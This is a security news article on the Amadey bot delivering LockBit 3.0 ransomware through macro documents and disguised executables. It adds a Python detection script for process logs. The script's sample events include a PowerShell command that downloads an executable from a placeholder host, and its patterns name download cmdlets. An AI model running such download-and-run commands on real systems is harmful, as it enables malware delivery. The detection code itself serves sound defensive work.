Amadey Bot Spotted Deploying LockBit 3.0 Ransomware on Hacked Machines
The Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems, researchers have warned.
In one attack chain, a document carries a malicious VBA macro that, when enabled by the victim, runs a PowerShell command to download and run Amadey.
In an alternative attack chain, Amadey is disguised as a seemingly harmless file bearing a Word icon but is actually an executable that's propagated via a phishing message.
Once Amadey executes successfully, it fetches and launches additional commands from a remote server, which include the LockBit ransomware in either PowerShell or binary format.
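From a detection standpoint, both delivery chains described above leave traces in process-creation telemetry. The following is an added example, not code from the researchers or the original article: the event field names, the sample events, and the double-extension heuristic for the Word-icon executable are assumptions made for illustration.

```python
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
DOWNLOAD_HINTS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|start-bitstransfer|net\.webclient",
    re.I,
)
# Assumption: the "Word icon" executable is often named with a document double extension.
DOUBLE_EXT = re.compile(r"\.(docx?|rtf|pdf|xlsx?)\.(exe|scr|com)$", re.I)


def basename(path):
    """Lower-cased file name from a Windows or POSIX style path."""
    return re.split(r"[\\/]", path)[-1].lower()


def classify(event):
    """Return the findings for one process-creation event."""
    findings = []
    parent, child = basename(event["parent_image"]), basename(event["image"])
    if parent in OFFICE_PARENTS and child in INTERPRETERS:
        findings.append("office_spawned_interpreter")
        if DOWNLOAD_HINTS.search(event["command_line"]):
            findings.append("download_cradle")
    if DOUBLE_EXT.search(child):
        findings.append("document_double_extension")
    return findings


def scan(events):
    """Map event index -> findings, keeping only events that matched something."""
    return {i: f for i, e in enumerate(events) if (f := classify(e))}


# Constructed sample events (field names are hypothetical, modelled on process-creation logs).
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c Invoke-WebRequest http://example.invalid/x -OutFile x.exe"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\alice\Downloads\Resume.docx.exe",
     "command_line": r"C:\Users\alice\Downloads\Resume.docx.exe"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "WINWORD.EXE /n report.docx"},
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS).items():
        print(index, findings)
```

The third sample event is a normal Word launch from Explorer and produces no finding, which is the baseline the first two events deviate from.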
LockBit 3.0, also known as LockBit Black, launched in June 2022, alongside a new dark web portal and the very first bug bounty program for a ransomware operation, promising rewards of up to $1 million for finding bugs in its website and software.
"As LockBit ransomware is being distributed through various methods, user caution is advised," the researchers concluded.
News URL
https://thehackernews.com/2022/11/amadey-bot-spotted-deploying-lockbit-30.html